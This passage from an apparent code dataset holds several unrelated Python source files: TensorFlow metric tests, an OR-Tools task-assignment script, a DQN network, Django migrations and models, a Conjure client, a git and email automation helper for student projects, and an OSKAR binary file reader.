session.run([a1, a2])\n self.assertAlmostEqual(actual1, expected)\n self.assertAlmostEqual(actual2, 1.0)\n\n def testSequenceAccuracyMetric(self):\n predictions = np.random.randint(4, size=(12, 12, 12, 1))\n targets = np.random.randint(4, size=(12, 12, 12, 1))\n expected = np.mean(\n np.prod((predictions == targets).astype(float), axis=(1, 2)))\n with self.test_session() as session:\n scores, _ = metrics.padded_sequence_accuracy(\n tf.one_hot(predictions, depth=4, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertEqual(actual, expected)\n\n def testNegativeLogPerplexity(self):\n predictions = np.random.randint(4, size=(12, 12, 12, 1))\n targets = np.random.randint(4, size=(12, 12, 12, 1))\n with self.test_session() as session:\n scores, _ = metrics.padded_neg_log_perplexity(\n tf.one_hot(predictions, depth=4, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertEqual(actual.shape, ())\n\n\nif __name__ == '__main__':\n 
tf.test.main()\n","sub_path":"Google/benchmarks/transformer/implementations/tpu-v3-32-transformer/transformer/utils/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"86887721","text":"\nfrom numpy.random import normal\nfrom numpy import rint\nimport random\nimport time\nfrom ortools.linear_solver import pywraplp\n\ndef main():\n #-------------------------------------------\n #randomize code created by Jeremy;\n def prMatrix(x):\n for row in x:\n for val in row:\n print(val,end=',')\n print()\n print()\n # example array of task costs on different nodes\n n=32 #number of tasks to be allocated\n\n x = [ [50]*n, [40]*n, [40]*n, [10]*n] #8 nodes\n\n print (x)\n print('initial x:')\n print('----------')\n prMatrix(x)\n\n\n ####### @jsinger new perturbation code for cost matrix\n # thresholds for changing costs\n COEFFICIENT_OF_VARIATION=0.5 # c.o.v. = stdev / mean = sigma/mu\n # try different values - between 0 and 1?\n for i in range(len(x)):\n for j in range(len(x[i])):\n mu = x[i][j]\n sigma = COEFFICIENT_OF_VARIATION * mu\n updated_value = int(rint(normal(mu, sigma)))\n x[i][j] = max(0, updated_value) # no negative costs!\n\n ##########\n\n print('final x:')\n print('----------')\n prMatrix(x)\n\n #-------------------------------------------\n #begin Google-or Tool;\n # Data\n costs = x\n num_workers = len(costs)\n num_tasks = len(costs[0])\n\n node_cap = [(n*0.15),(n*0.2),(n*0.2),(n*0.5)]\n\n\n print (node_cap)\n\n # Solver\n # Create the mip solver with the SCIP backend.\n #solver = pywraplp.Solver.CreateSolver('MIP')\n\n solver = pywraplp.Solver('SolveAssignmentProblem',\n pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\n\n start = time.time()\n edge_devices = ['192.168.1.222', '192.168.1.168', '192.168.1.182', '192.168.1.131']\n new_edge_devices = []\n e_devices='('\n\n # Variables\n # x[i, j] is an array of 0-1 variables, which will be 1\n # if worker i is assigned to task j.\n x = {}\n for i in range(num_workers):\n for j in range(num_tasks):\n x[i, j] = solver.IntVar(0, 1, '')\n\n # Constraints\n # Number of tasks assinged to each node less than the node capacitiy!\n for i in range(num_workers):\n solver.Add(solver.Sum([x[i, j] for j in range(num_tasks)]) <= node_cap[i])\n\n # Each task is assigned to exactly one worker.\n for j in range(num_tasks):\n solver.Add(solver.Sum([x[i, j] for i in range(num_workers)]) == 1)\n\n # Objective\n objective_terms = []\n for i in range(num_workers):\n for j in range(num_tasks):\n objective_terms.append(costs[i][j] * x[i, j])\n\n solver.Minimize(solver.Sum(objective_terms))\n\n # Solve\n status = solver.Solve()\n print('Minimum cost = ', solver.Objective().Value())\n\n #print()\n final_Workers_IP=[0]*len(costs[1])\n #print()\n\n # Print solution.\n if status == pywraplp.Solver.OPTIMAL or status == pywraplp.Solver.FEASIBLE:\n #print('Total cost = ', solver.Objective().Value(), '\\n')\n for i in range(num_workers):\n for j in range(num_tasks):\n # Test if x[i,j] is 1 (with tolerance for floating point arithmetic).\n if x[i, j].solution_value() > 0.5:\n final_Workers_IP[j]='\\''+edge_devices [i]+'\\' '\n e_devices+='\\''+edge_devices [i]+'\\' '\n print('Edge node %d assigned to task %d. Cost = %d' % (i, j, costs[i][j]))\n print()\n end = time.time()\n print(\"Time = \", round(end - start, 4), \"seconds\")\n #print (new_edge_devices)\n e_devices = e_devices[:-1]\n e_devices+=')'\n finalIPsBashFormat='('\n for i in range(num_tasks):\n finalIPsBashFormat+=final_Workers_IP[i]\n finalIPsBashFormat= finalIPsBashFormat[:-1]\n finalIPsBashFormat+=')'\n print ()\n print(finalIPsBashFormat)\nif __name__ == '__main__':\n main()\n","sub_path":"DeFog/dm/mipj1.py","file_name":"mipj1.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"86543632","text":"import ray\n\nfrom ray.rllib.models.model import Model\n# from ray.rllib.models.misc import get_activation_fn, flatten\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils import try_import_tf\nfrom ray.rllib.models.misc import normc_initializer, get_activation_fn\n\ntf = try_import_tf()\n\n\nclass DuelingDQN(Model):\n    \"\"\"Example of a custom model.\n    This model just delegates to the built-in fcnet.\n    \"\"\"\n\n def _build_layers_v2(self, input_dict, num_outputs, options):\n inputs = input_dict[\"obs\"]\n # filters = options.get(\"conv_filters\")\n filters = _get_filter_config(inputs.shape.as_list()[1:])\n\n with tf.name_scope(\"Conv_net\"):\n for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n inputs = tf.layers.conv2d(\n inputs,\n out_size,\n kernel,\n stride,\n activation=tf.nn.relu,\n padding=\"VALID\",\n name=\"conv{}\".format(i))\n out_size, kernel, stride = filters[-1]\n\n conv3 = tf.layers.conv2d(\n inputs,\n out_size,\n kernel,\n stride,\n activation=tf.nn.relu,\n padding=\"valid\",\n name=\"conv3\")\n\n conv3_flat = tf.layers.flatten(conv3)\n\n with tf.name_scope(\"fc_net\"):\n # label = \"fcn{}\".format(i)\n fcn4 = tf.layers.dense(\n conv3_flat,\n 512,\n kernel_initializer=normc_initializer(1.0),\n activation=tf.nn.relu,\n name=\"fcn4v\")\n fcnv = tf.layers.dense(\n fcn4,\n units=1,\n kernel_initializer=normc_initializer(1.0),\n activation=None,\n name=\"fcnv\")\n fcna = tf.layers.dense(\n fcn4,\n units=num_outputs,\n kernel_initializer=normc_initializer(1.0),\n activation=None,\n name=\"fcna\")\n # with tf.name_scope(\"fc_net\"):\n # # label = \"fcn{}\".format(i)\n # fcnv4 = tf.layers.dense(\n # conv3_flat,\n # 512,\n # kernel_initializer=normc_initializer(1.0),\n # activation=tf.nn.relu,\n # name=\"fcn4v\")\n # fcnv = tf.layers.dense(\n # fcnv4,\n # units=1,\n # kernel_initializer=normc_initializer(1.0),\n # activation=None,\n # name=\"fcnv\")\n # fcna4 = tf.layers.dense(\n # conv3_flat,\n # 512,\n # kernel_initializer=normc_initializer(1.0),\n # activation=tf.nn.relu,\n # name=\"fcn4v\")\n # fcna = tf.layers.dense(\n # fcna4,\n # units=num_outputs,\n # kernel_initializer=normc_initializer(1.0),\n # activation=None,\n # name=\"fcna\")\n q_values = fcnv + tf.subtract(fcna, tf.reduce_mean(fcna, axis=1, keepdims=True))\n # output = tf.argmax(q_values, 1)\n\n return q_values\n\n\ndef _get_filter_config(shape):\n shape = list(shape)\n\n filters = [\n [32, [8, 8], 4],\n [64, [4, 4], 2],\n [64, [3, 3], 1],\n ]\n if len(shape) == 3:\n return filters\n else:\n raise ValueError(\n \"input shape do not match conv_filters!\"\n )\n","sub_path":"algos/maxsqn_nstep_football/DQN_model.py","file_name":"DQN_model.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"23059504","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('ewords', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Self_ditictionary',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'Приватні словники',\n 'verbose_name': 'Приватний словник',\n 'get_latest_by': 'user',\n },\n ),\n migrations.AlterModelOptions(\n name='word',\n options={'verbose_name_plural': 'Слова', 'get_latest_by': 'word_name', 'verbose_name': 'Слово'},\n ),\n migrations.AlterField(\n model_name='word',\n name='word_name',\n field=models.CharField(verbose_name='Слово', serialize=False, primary_key=True, max_length=50, validators=[django.core.validators.RegexValidator('^[a-z+|Ĉ+|ĉ+|Ĝ+|ĝ+|Ŭ+|ŭ+|Ĥ+|ĥ+|Ŝ+|ŝ+]+$', 'Слово повинно бути тільки з esperanto букв')]),\n ),\n migrations.AddField(\n model_name='self_ditictionary',\n name='words',\n field=models.ManyToManyField(to='ewords.Word'),\n ),\n ]\n","sub_path":"ewords/migrations/0002_auto_20150709_1250.py","file_name":"0002_auto_20150709_1250.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"357619029","text":"import builtins\nfrom conjure_python_client import ConjureBeanType, ConjureDecoder, ConjureEncoder, ConjureFieldDefinition, Service\nfrom typing import Any, Dict, List\n\nclass SimpleNestedService(Service):\n\n def test_endpoint(self, string):\n # type: (str) -> str\n\n _headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n } # type: Dict[str, Any]\n\n _params = {\n } # type: Dict[str, Any]\n\n _path_params = {\n } # type: Dict[str, Any]\n\n _json = ConjureEncoder().default(string) # type: Any\n\n _path = '/catalog/testEndpoint'\n _path = _path.format(**_path_params)\n\n _response = self._request( # type: ignore\n 'POST',\n self._uri + _path,\n params=_params,\n headers=_headers,\n json=_json)\n\n _decoder = ConjureDecoder()\n return _decoder.decode(_response.json(), str)\n\nclass SimpleObject(ConjureBeanType):\n\n @builtins.classmethod\n def _fields(cls):\n # type: () -> Dict[str, ConjureFieldDefinition]\n return {\n 'string': ConjureFieldDefinition('string', str)\n }\n\n __slots__ = ['_string'] # type: List[str]\n\n def __init__(self, string):\n # type: (str) -> None\n self._string = string\n\n @builtins.property\n def string(self):\n # type: () -> str\n return self._string\n\n","sub_path":"conjure-python-core/src/test/resources/types/expected/package_name/nested_service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"502268347","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom cardss.models import Cards\nfrom userss.models import UserProfile\nfrom django.utils import timezone\n\n# Create your models her\n\n\nclass CardLikes(models.Model):\n user = models.ForeignKey(\n UserProfile,\n default=\"\",\n null=True,\n related_name='user_likes',\n blank=True)\n\n like_on_card = models.ForeignKey(\n Cards,\n default=\"\",\n null=True,\n blank=True,\n 
related_name='card_likes')\n\n like = models.IntegerField(default=0)\n\n like_time = models.DateTimeField(default=timezone.now)\n\n def __str__(self):\n return self.user.name\n\n class Meta:\n verbose_name = 'Like'\n","sub_path":"likess/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"594277809","text":"\"\"\"\n@file\n@brief Some automation helpers to grab mails from student about project.\n\"\"\"\nimport re, os\nimport pymmails\nfrom pyquickhelper import noLOG, run_cmd\n\n_email_regex = re.compile(\"[*] *e?mails? *: *([^*+]+)\")\n_gitlab_regex = re.compile(\"[*] *gitlab *: *([^*+]+[.]git)\")\n_video_regex = re.compile(\"[*] *videos? *: *([^*\\\\n]+)\")\n\ndef grab_mails(mailbox, emails, subfolder, date, no_domain=False, fLOG = noLOG):\n \"\"\"\n look for some emails in a mail box\n from specific emails or sent to specific emails\n\n @param mailbox MailBoxImap object (we assume you are logged in)\n @param emails list of emails\n @param date date (grab emails since ..., example ``1-Oct-2014``)\n @param subfolder folder of the mailbox to look into\n @param no_domain remove domain when searching for emails\n @param fLOG logging function\n @return list of emails\n \"\"\"\n res = [ ]\n for m in emails:\n ms = m.split('@')[0] if no_domain else m\n iter = mailbox.enumerate_search_person(ms, subfolder, date=date)\n mails = list(iter)\n fLOG(\"looking for mail:\", m, \":\", len(mails), \" mails\")\n res.extend(mails)\n return res\n\ndef get_regex(path, regex, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve data from file ``suivi.rst`` using a regular expression\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n if not os.path.exists(path):\n raise FileNotFoundError(path)\n filename = os.path.join( path, suivi)\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n with open(filename, \"r\", encoding=\"utf8\") as f :\n content = f.read()\n\n mails = regex.findall(content)\n if len(mails) == 0:\n raise Exception(\"unable to find the regular expression {0} in {1}\".format(regex.pattern, filename))\n\n allmails = [ ]\n for m in mails:\n allmails.extend ( m.strip(\"\\n\\r\\t \").split(\";\") )\n\n return allmails\n\ndef get_emails(path, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve student emails from file ``suivi.rst``\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n global _email_regex\n allmails = get_regex(path, _email_regex, suivi)\n for a in allmails :\n ff = a.split(\"@\")\n if len(ff) != 2:\n raise Exception(\"unable to understand mail {0} in {1} (mail separator is ;)\".format(a, filename))\n return allmails\n \n\ndef get_videos(path, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve student emails from file ``suivi.rst``\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n global _video_regex\n return get_regex(path, _video_regex, suivi)\n\ndef dump_mails_project(path,\n mailbox,\n subfolder,\n date,\n suivi = \"suivi.rst\",\n dest = \"emails\",\n no_domain = False,\n fLOG = noLOG):\n \"\"\"\n This function extract emails from a mailbox\n received from or sent to people\n\n The function expects to find a file ``suivi.rst`` which contains some emails addresses,\n it will look for mails and will dump them into the folder\n in HTML format.\n\n @param path folder\n @param mailbox MailBoxImap object (we assume you are logged in)\n @param suivi filename for ``suivi.rst``\n @param dest destinaion folder for the emails (relative to path)\n @param date date (grab emails since ..., example ``1-Oct-2014``)\n @param subfolder folder of the mailbox to look into\n @param no_domain remove domain when searching for emails\n @param fLOG logging function\n @return list of created files\n\n @example(Automation___Grab all emails from students)\n\n The following program assumes each folder contains the files\n of a student project.\n\n It assumes each folder contains a file ``suivi.rst``\n and emails from students can be extracted with\n by searching the following regular expression:\n ``mails: ....``.\n Then it stores everything into the folder in\n subfolder called ``mails``.\n\n @code\n from ensae_teaching_cs.automation.project_helper import dump_mails_project\n imap = pymmails.MailBoxImap(\"gmail.account\", \"password\", \"imap.gmail.com\", True)\n imap.login()\n\n sub = os.listdir(\".\")\n for fold in sub:\n print(\"***\",fold)\n dump_mails_project(\n os.path.abspath(fold),\n imap,\n subfolder = \"ensae\",\n date = \"1-Oct-2014\",\n no_domain=True,\n fLOG=print)\n @endcode\n\n The function expects ``suivi.rst`` must be encoded in ``utf8``.\n\n @endexample\n \"\"\"\n allmails = get_emails(path, suivi)\n\n fLOG(\"emails\",allmails)\n listmails = grab_mails(emails = allmails, mailbox=mailbox,\n subfolder=subfolder, date=date, fLOG=fLOG,\n no_domain=no_domain)\n\n absdest = os.path.join( path, dest)\n fs = mailbox.dump_html(listmails, absdest)\n\n memo = [ ]\n for mail,filename in fs:\n memo.append ( (mail.get_date(), filename, mail) )\n memo.sort()\n\n index = os.path.join(path, \"index_mail.html\")\n with open(index, \"w\", encoding=\"utf8\") as ff:\n ff.write(\"<html><body><h1>{0}</h1>\\n\".format(os.path.split(path)[-1]))\n ff.write(\"<ul>\\n\")\n for date, filename, mail in memo:\n fr = mail.get_from()[1]\n dt = date\n su = mail.get_field(\"subject\")\n li = '<li><a href=\"{0}\">{1} - from {2} - {3}</a></li>\\n'.format(filename, dt, fr, su)\n ff.write(li)\n ff.write(\"</ul>\\n\")\n ff.write(\"</body></html>\\n\")\n\n return [ _[1] for _ in memo ] + [ index ]\n\ndef git_url_user_password(url_https, user, password):\n \"\"\"\n builds a url (starting with https) and add the user and the password\n to skip the authentification\n\n @param url_https example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @return url\n \"\"\"\n url_user = url_https.replace(\"https://\", \"https://{0}:{1}@\".format(user, password))\n return url_user\n\ndef git_check_error(out, err, fLOG):\n \"\"\"\n private function, analyse the output\n \"\"\"\n if len(out) > 0 :\n fLOG(\"OUT:\\n\" + out)\n if len(err) > 0 :\n if \"error\" in err.lower():\n raise Exception(\"OUT:\\n{0}\\nERR:\\n{1}\".format(out,err))\n fLOG(\"ERR:\\n\" + err)\n\ndef git_clone(\n local_folder,\n url_https,\n user = None,\n password = None,\n timeout = 60,\n init = True,\n fLOG = noLOG):\n \"\"\"\n clone a project from a git repository in a non empty local folder,\n it requires `GIT <http://git-scm.com/>`_ to be installed\n and uses the command line.\n\n @param local_folder local folder of the project\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param init see below (True, use fetch, False, use clone)\n @param fLOG logging function\n @return local_folder\n\n If the reposity has already been cloned, it does not do it again.\n We assume that git can be run without giving its full location.\n\n The function executes the following commands (if init is True)::\n\n cd [folder]\n git init\n git remote add origin [https://user.password@server/project.git]\n git fetch\n\n Otherwise, it does::\n\n cd [folder]\n git clone origin [https://user.password@server/project.git]\n git fetch\n\n A folder will be created.\n\n @example(Automation___Clone many folders in one row)\n\n @code\n eleves = \"project1;project2;...\"\n root = r\"destination\"\n\n for el in eleves.split(\";\"):\n cl = el.lower().replace(\".\",\"-\")\n fold = os.path.join(root, cl)\n if not os.path.exists(fold):\n print(\"clone\", el)\n url = \"https://versioning.ensae.fr/python-2a/{0}.git\".format(cl)\n git_clone( root, url,user=user,password=password, init=False,fLOG=print)\n @endcode\n\n @endexample\n\n \"\"\"\n url_user = git_url_user_password(url_https, user, password)\n timeout = 60\n local_folder = os.path.normpath(os.path.abspath(local_folder))\n\n if init:\n if not os.path.exists(local_folder):\n fLOG(\"creating folder\", local_folder)\n os.mkdir(local_folder)\n\n hg = os.path.join(local_folder, \".git\")\n if not os.path.exists(hg):\n cmds= \"\"\"\n cd {0}\n git init\n git remote add origin {1}\n git fetch\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\n return local_folder\n else:\n if not os.path.exists(local_folder):\n raise FileNotFoundError(local_folder)\n hg = os.path.join(local_folder, \".git\")\n if os.path.exists(hg):\n raise Exception(\"folder {0} should not exists (init is True)\".format(local_folder))\n\n final = os.path.split(url_user)[-1].replace(\".git\",\"\")\n locf = os.path.join(local_folder, final)\n if os.path.exists(locf):\n raise Exception(\"folder {0} should not exists before cloning\".format(locf))\n\n cmds= \"\"\"\n cd {0}\n git clone {1}\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\n return locf\n\ndef git_change_remote_origin(\n local_folder,\n url_https,\n user = None,\n password = None,\n add_fecth = True,\n timeout = 10,\n fLOG = noLOG\n ):\n \"\"\"\n Change the origin of the repository. The url and the password\n refer to the new repository.\n\n @param local_folder local folder\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param add_fetch add instruction ``fetch``\n @param fLOG logging function\n @return something\n\n The function runs the instruction::\n\n git remote remove origin\n git remote add origin url\n\n \"\"\"\n url_user = git_url_user_password(url_https, user, password)\n cmds= \"\"\"\n cd {0}\n git remote remove origin\n git remote add origin {0}\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n if add_fetch:\n cmds += \"\\ngit fetch\"\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\ndef git_commit_all(\n local_folder,\n url_https,\n message,\n user = None,\n password = None,\n timeout = 300,\n fLOG = noLOG):\n \"\"\"\n from a git repository,\n it requires `GIT <http://git-scm.com/>`_ to be installed\n and uses the command line.\n\n @param local_folder local folder of the project\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param message message for the commit\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param fLOG logging function\n @return None\n\n If the reposity has already been cloned, it does not do it again.\n We assume that git can be run without giving its full location.\n\n The function executes the following commands::\n\n cd [folder]\n git add -A\n git commit -m \"[message]\"\n git push -u origin master\n\n \"\"\"\n #url_user = git_url_user_password(url_https, user, password)\n cmds= \"\"\"\n cd {0}\n git add -A\n git commit -m \"{1}\"\n git push -u origin master\n \"\"\".format(local_folder, message).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\ndef git_first_commit_all_projects(\n local_folder,\n user = None,\n password = None,\n timeout = 300,\n suivi = \"suivi.rst\",\n fLOG = noLOG):\n \"\"\"\n @param local_folder folder\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param suivi file to open to get the gitlab account\n @param fLOG logging function\n @return None or ( local_folder, gitlab )\n \"\"\"\n if not os.path.exists(local_folder):\n raise FileNotFoundError(local_folder)\n filename = os.path.join( local_folder, suivi)\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n with open(filename, \"r\", encoding=\"utf8\") as f :\n content = f.read()\n\n global _gitlab_regex\n gitlab = _gitlab_regex.findall(content)\n if len(gitlab) == 0:\n raise Exception(\"unable to find the regular expression {0} in {1}\".format(_gitlab_regex.pattern, filename))\n if not isinstance (gitlab, list):\n raise TypeError(\"we expect a list for: \" + str(gitlab))\n if len(gitlab) != 1:\n raise Exception(\"more than one gitlab repo is mentioned {0} in {1}\".format(_gitlab_regex.pattern, filename))\n gitlab = gitlab[0]\n\n fLOG(\"* gitlab\", gitlab)\n g = os.path.join(local_folder, \".git\")\n commit = None\n if not os.path.exists(g):\n fLOG(\"* initialize\", local_folder)\n git_clone(local_folder, gitlab,\n user=user, password=password, fLOG=fLOG)\n sub = os.path.split(local_folder)[-1]\n fLOG(\"* first commit \", gitlab)\n git_commit_all(local_folder, gitlab,\n \"first commit to \" + sub,\n user=user, password=password, fLOG=print)\n commit= local_folder, gitlab\n\n return commit","sub_path":"src/ensae_teaching_cs/automation/project_helper.py","file_name":"project_helper.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"374342999","text":"# -*- coding: utf-8 -*-\n\"\"\"Read OSKAR binary files from python.\"\"\"\n\nimport collections\nimport os\nimport struct\n\nimport astropy.units as u\nimport numpy\nfrom astropy.coordinates import ICRS, EarthLocation, SkyCoord\n\nfrom rascil.data_models.memory_data_models import Visibility, Configuration\n\n\nclass OskarBinary(object):\n\n \"\"\"Class providing an interface to OSKAR binary data files.\n\n see:\n http://www.oerc.ox.ac.uk/~ska/oskar2/OSKAR-Binary-File-Format.pdf\n\n TODO:\n - Split data reading from indexing to be able to deal with very large\n files and make reading a sub-set of the data faster.\n \"\"\"\n\n # noinspection PyRedeclaration\n class DataType:\n # noinspection PyRedeclaration\n Char, Int, Single, Double, _, Complex, Matrix, _ = range(8)\n\n # noinspection PyRedeclaration,PyRedeclaration,PyRedeclaration,PyRedeclaration\n class Group:\n # noinspection PyRedeclaration,PyRedeclaration,PyRedeclaration,PyRedeclaration\n _, Standard, _, Settings, RunInfo, _, _,\\\n Sky, _, Spline, Element, VisHeader, VisBlock = range(13)\n\n class Standard:\n _, DateTime, Version, UserName, WorkingDir = range(5)\n\n class Settings(object):\n Path = 1\n File = 2\n\n class RunInfo(object):\n Log = 1\n\n def __init__(self, file_name):\n \"\"\"Constructor.\"\"\"\n if not os.path.exists(file_name):\n raise ValueError('Specified visibility file %s not found!' % file_name)\n self.file_name = file_name\n self.file_handle = open(file_name, 'rb')\n self.bin_ver = 0\n self.record = collections.OrderedDict()\n self.read()\n\n def __del__(self):\n \"\"\"Destructor.\"\"\"\n self.file_handle.close()\n\n def read_header(self):\n \"\"\"Read header.\"\"\"\n f = self.file_handle\n name = f.read(9)\n if name[0:8] != b'OSKARBIN':\n raise ValueError('Not a valid OSKAR binary file.')\n bin_ver = struct.unpack('B', f.read(1))[0]\n if not (bin_ver == 1 or bin_ver == 2):\n raise ValueError('The class can only read OSKAR binary '\n 'format version 1 or 2.')\n self.bin_ver = bin_ver\n\n # Version 1: header information.\n if bin_ver == 1:\n endian = struct.unpack('B', f.read(1))[0]\n svoid = struct.unpack('B', f.read(1))[0]\n sint = struct.unpack('B', f.read(1))[0]\n slong = struct.unpack('B', f.read(1))[0]\n sfloat = struct.unpack('B', f.read(1))[0]\n sdouble = struct.unpack('B', f.read(1))[0]\n patch = struct.unpack('B', f.read(1))[0]\n minor = struct.unpack('B', f.read(1))[0]\n major = struct.unpack('B', f.read(1))[0]\n other = struct.unpack('B', f.read(1))[0]\n # Version 2: read remaining reserved space.\n else:\n _ = f.read(64 - 10)\n\n @staticmethod\n def is_set(x, n):\n \"\"\"Checks if a flag is set (value of bit n in byte x).\"\"\"\n return x & 2**n != 0\n\n def read_block_header(self, block_index):\n \"\"\".\"\"\"\n f = self.file_handle\n\n element_size = struct.unpack('B', f.read(1))[0]\n chunk_flags = struct.unpack('B', f.read(1))[0]\n data_type = struct.unpack('B', f.read(1))[0]\n group = struct.unpack('B', f.read(1))[0]\n tag = struct.unpack('B', f.read(1))[0]\n index = struct.unpack('i', f.read(4))[0]\n block_size = struct.unpack('l', f.read(8))[0]\n\n if group not in self.record:\n self.record[group] = collections.OrderedDict()\n if tag not in self.record[group]:\n self.record[group][tag] = collections.OrderedDict()\n if index not in self.record[group][tag]:\n self.record[group][tag][index] = collections.OrderedDict()\n\n block = self.record[group][tag][index]\n block['group'] = group\n block['tag'] = tag\n block['index'] = index\n block['number'] = block_index\n block['element_size'] = element_size\n block['chunk_flags'] = chunk_flags\n block['flag_endian'] = self.is_set(chunk_flags, 5)\n block['flag_crc'] = self.is_set(chunk_flags, 6)\n block['flag_extended'] = self.is_set(chunk_flags, 7)\n block['data_type'] = data_type\n block['block_size'] = block_size\n\n return block\n\n def read_block_data(self, block):\n \"\"\".\"\"\"\n f = self.file_handle\n\n # Data size of the block payload.\n data_size = block['block_size']\n if block['flag_crc']:\n data_size -= 4\n\n # Read the block payload.\n if self.is_set(block['data_type'], self.DataType.Char):\n name = 'char'\n n = data_size\n data = f.read(data_size)\n\n elif self.is_set(block['data_type'], self.DataType.Int):\n name = 'int'\n n = data_size // block['element_size']\n data = struct.unpack('i' * n, f.read(data_size))\n\n elif self.is_set(block['data_type'], self.DataType.Single):\n if self.is_set(block['data_type'], self.DataType.Matrix):\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'single complex matrix'\n n = data_size // block['element_size'] * 2 * 4\n else:\n name = 'single matrix'\n n = data_size // block['element_size'] * 4\n else:\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'single complex'\n n = data_size // block['element_size'] * 2\n else:\n name = 'single'\n n = data_size // block['element_size']\n data = struct.unpack('f' * n, f.read(data_size))\n\n elif self.is_set(block['data_type'], self.DataType.Double):\n if self.is_set(block['data_type'], self.DataType.Matrix):\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'double complex matrix'\n n = data_size // block['element_size'] * 2 * 4\n else:\n name = 'double matrix'\n n = data_size // block['element_size'] * 4\n else:\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'double complex'\n n = data_size // block['element_size'] * 2\n else:\n name = 'double'\n n = data_size // block['element_size']\n data = struct.unpack('d ' * n, f.read(data_size))\n\n else:\n raise ValueError('ERROR: Unknown binary data type detected.')\n\n # Add the data block into the block dictionary.\n block['data_type_name'] = name\n block['data_length'] = n\n block['data'] = numpy.squeeze(data)\n\n if (self.is_set(block['data_type'], self.DataType.Double) or\n self.is_set(block['data_type'], self.DataType.Single)) \\\n and block['data'].shape != ():\n assert len(block['data'].shape) == 1, \\\n 'Unexpected Matrix like block data shape detected ' \\\n '@ block number %i id:(%i.%i.%i)' % (block['number'],\n block['group'],\n block['tag'],\n block['index'])\n # Convert complex data to python complex type\n if self.is_set(block['data_type'], self.DataType.Complex):\n block['data'] = numpy.array([complex(v[0], v[1]) for v\n in block['data'].reshape(n // 2, 2)\n ])\n block['block_length'] = n / 